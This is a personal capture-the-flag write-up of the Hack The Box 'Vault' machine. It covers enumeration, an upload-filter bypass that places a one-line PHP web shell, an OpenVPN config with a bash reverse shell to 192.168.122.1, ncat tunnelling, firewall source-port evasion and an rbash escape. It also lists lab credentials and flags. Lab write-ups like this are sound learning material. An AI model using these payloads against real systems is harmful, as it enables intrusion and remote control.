Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
DansALLNotes/HTB_Writups/Vault.md
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
570 lines (436 sloc)
17.2 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
--- | |
Title: "Vault" | |
tags: "Linux" | |
--- | |
# Recon Phase | |
## Nmap | |
~~~term | |
dang@dang-laptop ~/Documents/HTB/Frolic$ nmap -sV 10.10.10.109 | |
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-05 18:48 GMT | |
Nmap scan report for 10.10.10.109 | |
Host is up (0.024s latency). | |
Not shown: 997 closed ports | |
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | |
80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | |
1234/tcp open tcpwrapped | |
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel | |
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds | |
dang@dang-laptop ~/Documents/HTB/Frolic$ | |
~~~ | |
Again we find SSH and HTTP | |
## HTTP Enumeration | |
A bit of hand enumertion based on the site shows that there is something in the "Sparklays" url | |
WE also end up with login.php as a Access denied. | |
Lets see what the http Enumeation scripts bring up.... | |
~~~term | |
dang@dang-laptop ~/Documents/HTB/Frolic$ nmap -sV --script=http-enum 10.10.10.109 | |
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-05 18:50 GMT | |
Nmap scan report for 10.10.10.109 | |
Host is up (0.024s latency). | |
Not shown: 998 closed ports | |
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | |
80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | |
|_http-server-header: Apache/2.4.18 (Ubuntu) | |
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel | |
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
Nmap done: 1 IP address (1 host up) scanned in 9.50 seconds | |
dang@dang-laptop ~/Documents/HTB/Frolic$ | |
~~~ | |
Looking at the page, we see a search term ```sparkleys```, Perhaps something lives there... | |
The page is place holder text but it goves us a foothold with Nikto. | |
However, Nikto shows.... | |
~~~term | |
$ nikto -host http://10.10.10.109/sparklays/ | |
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type | |
+ No CGI Directories found (use '-C all' to force check all possible dirs) | |
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS | |
+ OSVDB-29786: /sparklays/admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected. | |
+ OSVDB-29786: /sparklays/admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected. | |
+ OSVDB-3092: /sparklays/admin.php: This might be interesting... | |
+ /sparklays/login.php: Admin login page/section found. | |
+ 7499 requests: 0 error(s) and 8 item(s) reported on remote host | |
+ End Time: 2019-03-10 22:47:12 (GMT0) (491 seconds) | |
~~~ | |
Admin page, but no creds | |
```gobuster -u http://10.10.10.109/sparklays -t 50 -w common.txt -x .php,.html,.txt``` | |
Try Gobuster with the Common word lis | |
~~~html | |
user@kali:/usr/share/wordlists/dirb$ gobuster -u http://10.10.10.109/sparklays -t 50 -w common.txt -x .php,.html,.txt | |
===================================================== | |
Gobuster v2.0.1 OJ Reeves (@TheColonial) | |
===================================================== | |
[+] Mode : dir | |
[+] Url/Domain : http://10.10.10.109/sparklays/ | |
[+] Threads : 50 | |
[+] Wordlist : common.txt | |
[+] Status codes : 200,204,301,302,307,403 | |
[+] Extensions : php,html,txt | |
[+] Timeout : 10s | |
===================================================== | |
2019/03/10 23:05:47 Starting gobuster | |
===================================================== | |
/.htpasswd (Status: 403) | |
/.htpasswd.php (Status: 403) | |
/.htpasswd.html (Status: 403) | |
/.htaccess (Status: 403) | |
/.htpasswd.txt (Status: 403) | |
/.htaccess.php (Status: 403) | |
/.htaccess.html (Status: 403) | |
/.htaccess.txt (Status: 403) | |
/.hta (Status: 403) | |
/.hta.php (Status: 403) | |
/.hta.html (Status: 403) | |
/.hta.txt (Status: 403) | |
/admin.php (Status: 200) | |
/admin.php (Status: 200) | |
/design (Status: 301) | |
/login.php (Status: 200) | |
===================================================== | |
2019/03/10 23:06:38 Finished | |
===================================================== | |
user@kali:/usr/share/wordlists/dirb$ | |
~~~ | |
> And FFS Learning More about CTF Here. Lets start Enumerating Deeper. | |
Lets also Enumerate the design folder.... | |
~~~ term | |
user@kali:/usr/share/wordlists/dirb$ gobuster -u http://10.10.10.109/sparklays/design -t 50 -w common.txt -x .php,.html,.txt | |
===================================================== | |
Gobuster v2.0.1 OJ Reeves (@TheColonial) | |
===================================================== | |
[+] Mode : dir | |
[+] Url/Domain : http://10.10.10.109/sparklays/design/ | |
[+] Threads : 50 | |
[+] Wordlist : common.txt | |
[+] Status codes : 200,204,301,302,307,403 | |
[+] Extensions : html,txt,php | |
[+] Timeout : 10s | |
===================================================== | |
2019/03/10 23:12:15 Starting gobuster | |
===================================================== | |
/.hta (Status: 403) | |
/.hta.html (Status: 403) | |
/.hta.txt (Status: 403) | |
/.htaccess (Status: 403) | |
/.hta.php (Status: 403) | |
/.htaccess.php (Status: 403) | |
/.htaccess.html (Status: 403) | |
/.htaccess.txt (Status: 403) | |
/.htpasswd (Status: 403) | |
/.htpasswd.php (Status: 403) | |
/.htpasswd.html (Status: 403) | |
/.htpasswd.txt (Status: 403) | |
/design.html (Status: 200) | |
/uploads (Status: 301) | |
===================================================== | |
2019/03/10 23:13:07 Finished | |
===================================================== | |
user@kali:/usr/share/wordlists/dirb$ | |
~~~ | |
Nice we get evntually get a HTML page Going to | |
<http://10.10.10.109/sparklays/design/changelogo.php> Lets us upload images | |
We can then find them in ```http://10.10.10.109/sparklays/design/uploads/foo.jpg``` | |
So We can upload .jpg, but they come with errors. Google for stuff on Uplaod Bypass: | |
- <https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf> | |
- <https://pentestlab.blog/2012/11/29/bypassing-file-upload-restrictions/> | |
Examples like this Fails. | |
~~~ root | |
<img src="http://10.10.10.109/sparklays/design//uploads/foo.php.jpg" alt="The image “http://10.10.10.109/sparklays/design//uploads/foo.php.jpg” cannot be displayed because it contains errors."> | |
~~~ | |
Lets work through the other file types suggested: | |
[x] png | |
[x] bmp | |
[./] jpg | |
[x] txt | |
[x] php | |
[/] php5 | |
SO I can upload and run PHP scripts :) | |
And it looks like PHPinfo can be uploaded. (Alghough it looks screwey) | |
## Getting a Shell | |
This time I felt like doing something slightly different to the | |
~~~ term | |
cat foo.php5 | |
<?php | |
system($_GET['evil']); | |
?> | |
~~~ | |
Then going to ```http://10.10.10.109/sparklays/design/uploads/foo.php5?evil=ls``` | |
Gives me a Dirlisting :) | |
Possible Password in: | |
```?evil=cat /home/dave/Desktop/key``` : itscominghome | |
And also in dave/Desktop/ssh | |
~~~ | |
dave Dav3therav3123 | |
~~~ | |
And in Servers | |
~~~ | |
DNS + Configurator - 192.168.122.4 | |
Firewall - 192.168.122.5 | |
The Vault - x | |
~~~ | |
However, **WHERE IS THE DAMN USER.TXT???*** | |
So this would imply that the Servers above are avaliable interenally. | |
## SSH into Dave | |
Looks like we found SSH credentials in the recon above. | |
- user: dave | |
- password: Dav3thetav123 | |
This allows us to log into the Server above. | |
# A Maze of tunnels all alike | |
We found a list of servers, in ```~/dave/Servers``` | |
~~~ | |
DNS + Configurator - 192.168.122.4 | |
Firewall - 192.168.122.5 | |
The Vault - x | |
~~~ | |
Looks like we are going to have to traverse. | |
https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html | |
https://0xdf.gitlab.io/2018/06/10/intro-to-ssh-tunneling.html | |
Nice Oneliner for port scanning here to check the Hosts I have found. | |
~~~ term | |
dave@ubuntu:~/.ssh$ for i in $(seq 1 254); do (ping -c 1 192.168.122.${i} | grep "bytes from" &); done; | |
64 bytes from 192.168.122.1: icmp_seq=1 ttl=64 time=0.065 ms | |
64 bytes from 192.168.122.4: icmp_seq=1 ttl=64 time=0.758 ms | |
64 bytes from 192.168.122.5: icmp_seq=1 ttl=64 time=0.881 ms | |
dave@ubuntu:~/.ssh$ | |
~~~ | |
What else is open | |
(z == report open ports, rather than open them) | |
~~~ term | |
nc -zv 192.168.122.4 1-1023 | |
~~~ | |
## DNS Server | |
We know that the DNS server has a http port | |
Setup some tunnels to forward this | |
~~~ term | |
$dave ssh -L 4242:192.168.122.4:80 dave@10.10.10.109 | |
$dang ssh -L 4242:localhost:4242 dave@10.10.10.109 | |
~~~ | |
> NOTE: I Realise I could probably cut out a setp by forwarding 122.4 | |
> to My Server. | |
Main Page shows a DNS config, and OPpen VPN checker | |
Enumerate The rest of the web site with gobuster | |
~~~ term | |
/.hta (Status: 403) | |
/.htaccess (Status: 403) | |
/.htpasswd (Status: 403) | |
/index.php (Status: 200) | |
/notes (Status: 200) | |
/server-status (Status: 403) | |
~~~ | |
notes file contains | |
~~~ | |
chmod 123.ovpn and script.sh to 777 | |
~~~ | |
And we also find 123.ovpn | |
~~~ | |
remote 192.168.122.1 | |
dev tun | |
nobind | |
script-security 2 | |
up "/bin/bash -c 'bash -i >& /dev/tcp/192.168.122.1/2323 0>&1'" | |
~~~ | |
and script.sh | |
~~~ | |
#!/bin/bash | |
sudo openvpn 123.ovpn | |
~~~ | |
This may also be our way forward... | |
https://medium.com/tenable-techblog/reverse-shell-from-an-openvpn-configuration-file-73fd8b1d38da | |
So the Open VPN stuff will forward a shell to port ```2323``` to ```192.168.122.1``` | |
Thats a really nifty command :P | |
So Lets see if the Damn Configuurator on the website does works | |
Upload the 123.ovpn file | |
HAve a netcat listener on the Dave (port 2323) | |
~~~term | |
Last login: Thu Mar 14 15:41:03 2019 from 10.10.10.109 | |
dave@ubuntu:~$ nc -nvlp 2323 | |
Listening on [0.0.0.0] (family 0, port 2323) | |
Connection from [192.168.122.4] port 2323 [tcp/*] accepted (family 2, sport 58896) | |
bash: cannot set terminal process group (1093): Inappropriate ioctl for device | |
bash: no job control in this shell | |
root@DNS:/var/www/html# | |
~~~ | |
And it gives us User Flag !!! | |
~~~term | |
root@DNS:/home/dave# cat user.txt | |
cat user.txt | |
a4947faa8d4e1f80771d34234bd88c73 | |
~~~ | |
I Also think I have the SSH password So I dont need to repeat myself | |
Dave is also Sudo, so happy days there, if we lose the connection.. | |
- user: dave | |
- user: dav3gerous567 | |
# On the DNS Box | |
Thrutching around on the DNS box. | |
Not a huge abount here in terms of files | |
In /var/www/DNS we have | |
~~~ term | |
auto ens3 | |
iface ens3 inet static | |
address 192.168.122.4 | |
netmask 255.255.255.0 | |
up route add -net 192.168.5.0 netmask 255.255.255.0 gw 192.168.122.5 | |
up route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.28 | |
~~~ | |
Which gives us a clue as to the addresses we are lookin at. | |
We also have Alex (Who prob set this up...), with stuff in the .bash_history | |
~~~ term | |
ping 192.168.5.2 | |
su root | |
nc -lvp 8888 | |
exit | |
~~~ | |
If we take a look, at x.5.2 we get something interesting. | |
~~~ term | |
Starting Nmap 7.01 ( https://nmap.org ) at 2019-03-14 23:18 GMT | |
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers | |
Nmap scan report for Vault (192.168.5.2) | |
Host is up (0.0030s latency). | |
Not shown: 998 filtered ports | |
PORT STATE SERVICE VERSION | |
53/tcp closed domain | |
4444/tcp closed krb524 | |
~~~ | |
I think the Firewall is blocking stuff.... | |
Poking a round more, In Auth.log there is | |
~~~ term | |
Sep 2 15:07:51 DNS sudo: dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f | |
Sep 2 15:07:51 DNS sudo: pam_unix(sudo:session): session opened for user root by dave(uid=0) | |
Sep 2 15:08:55 DNS sudo: pam_unix(sudo:session): session closed for user root | |
Sep 2 15:09:01 DNS CRON[2459]: pam_unix(cron:session): session opened for user root by (uid=0) | |
Sep 2 15:09:01 DNS CRON[2459]: pam_unix(cron:session): session closed for user root | |
Sep 2 15:10:20 DNS sudo: dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 1234 --sh-exec ncat 192.168.5.2 987 -p 53 | |
Sep 2 15:10:20 DNS sudo: pam_unix(sudo:session): session opened for user root by dave(uid=0) | |
Sep 2 15:10:34 DNS sudo: dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 3333 --sh-exec ncat 192.168.5.2 987 -p 53 | |
~~~ | |
We can nmap the server and if we pretend we are from 4444. We find somehting that is open. | |
~~~ term | |
root@DNS:/var/log# nmap 192.168.5.2 -Pn --source-port=4444 -f | |
Starting Nmap 7.01 ( https://nmap.org ) at 2019-03-14 23:28 GMT | |
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers | |
Nmap scan report for Vault (192.168.5.2) | |
Host is up (0.0035s latency). | |
Not shown: 999 closed ports | |
PORT STATE SERVICE | |
987/tcp open unknown | |
~~~ | |
Rough Idea of what is going on with NCAT | |
- Listen on port 1234 | |
- Then start a second NC to port 987 with -p (source port) 53 | |
- ssh2 on 4444?? | |
We can confirm this.... Looks like | |
~~~ term | |
root@DNS:/var/log# ncat -nv 192.168.5.2 987 -p 53 | |
Ncat: Version 7.01 ( https://nmap.org/ncat ) | |
Ncat: Connected to 192.168.5.2:987. | |
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4 | |
ls | |
Protocol mismatch. | |
whoami | |
~~~ | |
So are we tunneling SSH through the server?? | |
~~~term | |
ncat -nlv 1234 --sh-exec "/usr/bin/ncat -nv 192.168.5.2 987 -p 53" | |
~~~ | |
Then we SSH in to Vault (via localhost) using SSH on port 1234 | |
~~~ term | |
ssh dave@127.0.0.1 -P 1234 | |
~~~ | |
Our Next issue is being stuck in rbash FFS. | |
We can escape that using ```Less !/bin/bash```. | |
If we kill the connection we can do a reverse SCP to grab the Encoded file | |
~~~ term | |
dave@DNS:~$ scp -P 1234 dave@127.0.0.1:/home/dave/root.txt.gpg . | |
The authenticity of host '[127.0.0.1]:1234 ([127.0.0.1]:1234)' can't be established. | |
ECDSA key fingerprint is SHA256:Wo70Zou+Hq5m/+G2vuKwUnJQ4Rwbzlqhq2e1JBdjEsg. | |
Are you sure you want to continue connecting (yes/no)? yes | |
Warning: Permanently added '[127.0.0.1]:1234' (ECDSA) to the list of known hosts. | |
dave@127.0.0.1's password: | |
~~~ | |
Store as a Hexdump (as a backup) | |
~~~ term | |
root@DNS:/home/dave# hexdump root.txt.gpg | |
0000000 0285 030c 78c7 10c6 ebd1 031f 1001 a000 | |
0000010 ea98 1ad3 6e36 497e 8d7d e8d0 1543 3966 | |
0000020 5030 c9ae cc3d 1214 51bd 4c35 f27d 354e | |
0000030 e1a0 b65d 31e8 3c52 4907 719f 15f4 b23d | |
0000040 7a98 a1f7 94e1 4fa9 463b ecae 8537 1acb | |
0000050 158f d1b8 27d8 a170 4f3f ff05 b92f 3321 | |
0000060 a512 b665 2af0 58df 6dd0 547a 0d48 c580 | |
0000070 a384 f5dd 088a 0809 c53d 4d01 0937 7602 | |
0000080 d09c 2643 505e cd10 26d0 51bc fb14 51d0 | |
0000090 ca91 0d49 582a c557 21b6 fe07 c97e d7e1 | |
00000a0 5c88 9b73 6557 5706 63d2 2eed 185c 5256 | |
00000b0 e36a 2918 7c57 9ce7 eb9a 4895 260a 2aa9 | |
00000c0 ad86 db62 44f2 be00 9754 3959 cf6a 6b47 | |
00000d0 7c53 f729 99e3 2cf1 14ad f125 b934 ba34 | |
00000e0 de02 6965 0fdf 5f74 d842 2087 47dc c73e | |
00000f0 353f 74df 1df3 e133 34bd f545 8ecd e91c | |
0000100 f5ca 13b3 2d9d 54ca b6c1 8a78 7bd7 305e | |
0000110 ef80 7650 d7dc ed1d e2e9 602c 12a4 dab0 | |
0000120 4656 f261 b886 220f ef06 f1c6 54a8 82c3 | |
0000130 974e 7eac cfa9 d1d5 105e 49c1 c299 327b | |
0000140 d13d 1b69 67c4 389c 361e 0370 1ab0 874b | |
0000150 7472 e385 9787 3e0d 62b4 615f bbe9 65d1 | |
0000160 1051 7f17 f5f7 bee7 c69c e596 4fbe 6c9d | |
0000170 6fc6 c2f3 44e2 64f7 9637 2861 a0a5 9a5e | |
0000180 c3e6 0cb0 82ed fa2f a6a2 0570 3f3e b614 | |
0000190 6b18 2708 8f10 d18a 6c1f 7ade 321e f8f5 | |
00001a0 9b77 b771 0fed f694 6053 3ca6 d2e3 d57c | |
00001b0 f809 acdd 6fc4 ce52 b762 291c 068f 37b1 | |
00001c0 b6aa 59ab 7b31 e150 2c3c 00da 4b78 b54f | |
00001d0 ee9e a19d d4c5 d7a3 e023 f479 27b3 467f | |
00001e0 d810 2309 db57 314c 331a 243c b63e 23b8 | |
00001f0 2263 2124 8115 d599 dadb 1c11 2bf6 6b98 | |
0000200 c71f 528b 1c90 b4ba b795 6fe3 f3ec d2c7 | |
0000210 0164 4470 ba76 d10b afeb 92b1 e756 2728 | |
0000220 f69c d290 3e80 bf74 4971 7381 9d73 9978 | |
0000230 c54c f3d7 3341 722e fc6b 0cf7 3620 8d02 | |
0000240 ee2c 99b0 6921 54a5 a667 c462 01f8 0868 | |
0000250 a04a 94fc d4bd 66de 1656 904f 167c 5fe9 | |
0000260 0b78 0513 7cff 4c6a a9c2 17cc 11dd b41a | |
0000270 6630 8f22 00df | |
0000275 | |
~~~ | |
We need the Secret Key | |
~~~ term | |
root@DNS:/home/dave# gpg root.txt.gpg | |
gpg: directory `/root/.gnupg' created | |
gpg: new configuration file `/root/.gnupg/gpg.conf' created | |
gpg: WARNING: options in `/root/.gnupg/gpg.conf' are not yet active during this run | |
gpg: keyring `/root/.gnupg/secring.gpg' created | |
gpg: keyring `/root/.gnupg/pubring.gpg' created | |
gpg: encrypted with RSA key, ID D1EB1F03 | |
gpg: decryption failed: secret key not available | |
root@DNS:/home/dave# | |
~~~ | |
Check what keys are avaialbe: | |
Not on DNS server | |
~~~ term | |
root@DNS:/var/log# gpg --list-secret-keys | |
gpg: /root/.gnupg/trustdb.gpg: trustdb created | |
root@DNS:/var/log# gpg --list-secret-keys | |
~~~ | |
Key does appear to be on The first Server :) | |
And the Passphrase of "itscominghome" that we found about 2 days ago in the Recon part | |
~~~ term | |
dave@ubuntu:/tmp$ gpg root.txt.gpg | |
You need a passphrase to unlock the secret key for | |
user: "david <dave@david.com>" | |
4096-bit RSA key, ID D1EB1F03, created 2018-07-24 (main key ID 0FDFBFE4) | |
gpg: encrypted with 4096-bit RSA key, ID D1EB1F03, created 2018-07-24 | |
"david <dave@david.com>" | |
dave@ubuntu:/tmp$ ls | |
root.txt systemd-private-215c6f7f4c04468996eb09264769d510-colord.service-fzn51m systemd-private-215c6f7f4c04468996eb09264769d510-systemd-timesyncd.service-Cstw1F vmware-root | |
root.txt.gpg systemd-private-215c6f7f4c04468996eb09264769d510-rtkit-daemon.service-mNFDbm VMwareDnD | |
dave@ubuntu:/tmp$ cat root.txt | |
ca468370b91d1f5906e31093d9bfe819 | |
dave@ubuntu:/tmp$ | |
~~~ | |
## RABBIT: Hidden text file | |
There is also a .root.txt.swp | |
Turns out its a Vi Backup File | |
May be able to recover it with ```vim -r``` (Doesnt work) | |
However, aparently the file is being edited by dave with pricess 4872. Can we grab that process | |